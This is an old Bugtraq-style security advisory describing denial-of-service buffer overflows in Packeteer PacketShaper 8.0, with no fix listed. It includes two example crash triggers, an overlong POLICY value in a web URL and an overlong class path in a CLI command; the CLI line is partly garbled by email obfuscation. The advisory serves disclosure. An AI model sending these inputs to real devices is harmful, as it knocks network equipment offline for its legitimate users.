Packeteer PacketShaper Multiple Buffer Overflow Denial Of Service Vulnerabilities

Bugtraq ID:	21933
Class:	Failure to Handle Exceptional Conditions
CVE:
Remote:	Yes
Local:	No
Published:	Jan 08 2007 12:00AM
Updated:	Jan 08 2007 11:26PM
Credit:	[email protected] disclosed this issue.
Vulnerable:	Packeteer PacketShaper 8.0
Not Vulnerable:

Packeteer PacketShaper Multiple Buffer Overflow Denial Of Service Vulnerabilities

Packeteer PacketShaper is prone to multiple denial-of-service vulnerabilities.

A remote attacker may exploit these issues to cause the device to crash, denying further service to legitimate users.

Packeteer PacketShaper Version 8.0 is vulnerable to these issues; other versions may also be affected.

Packeteer PacketShaper Multiple Buffer Overflow Denial Of Service Vulnerabilities

An attacker may trigger these vulnerabilities by using a browser and standard command-line tools.

Example exploits have been provided:

https://www.example.com/clastree.htm?POLICY=/Inbound/Filesharing/BitTorrent/Ax1500

# class show /Inbound/Ax1500mailto:[email protected]

Packeteer PacketShaper Multiple Buffer Overflow Denial Of Service Vulnerabilities

Solution:
Currently we are not aware of any fixes for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].

Packeteer PacketShaper Multiple Buffer Overflow Denial Of Service Vulnerabilities

References:

• Packeteer PacketShaper Web Site (Packeteer )
  
• Packeteer PacketWise CLI overflow DoS ([email protected])